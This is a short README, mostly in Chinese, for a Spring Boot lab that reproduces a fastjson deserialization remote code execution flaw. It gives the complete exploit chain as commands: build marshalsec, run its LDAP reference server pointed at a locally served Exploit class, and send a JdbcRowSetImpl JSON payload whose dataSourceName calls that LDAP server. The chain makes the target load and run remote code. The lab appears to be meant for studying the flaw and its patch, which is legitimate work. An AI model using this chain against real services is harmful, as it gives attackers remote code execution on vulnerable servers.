fastjson rce env based on springboot
-
Exploit.java 编译好的class 文件文件和利用工具在Exploit 目录下
-
利用工具也可以自行下载编译
git clone https://github.com/mbechler/marshalsec.git [克隆项目到本地] mvn clean package -DskipTests [这条命令执行完之后会在target 目录生成我们需要的可执行文件:marshalsec-0.0.3-SNAPSHOT-all.jar]
- java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8081/#Exploit 10086
- python -m http.server 8081
- 发送利用payload:{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName": "ldap://127.0.0.1:10086/Object","autoCommit": true}
- 通过H2 数据库,对数据做了持久化处理,可以保存提交的数据到服务端
- 增加了前端页面,可以通过按钮添加、删除、查询三国数据
- 分析漏洞源码
- 分析补丁情况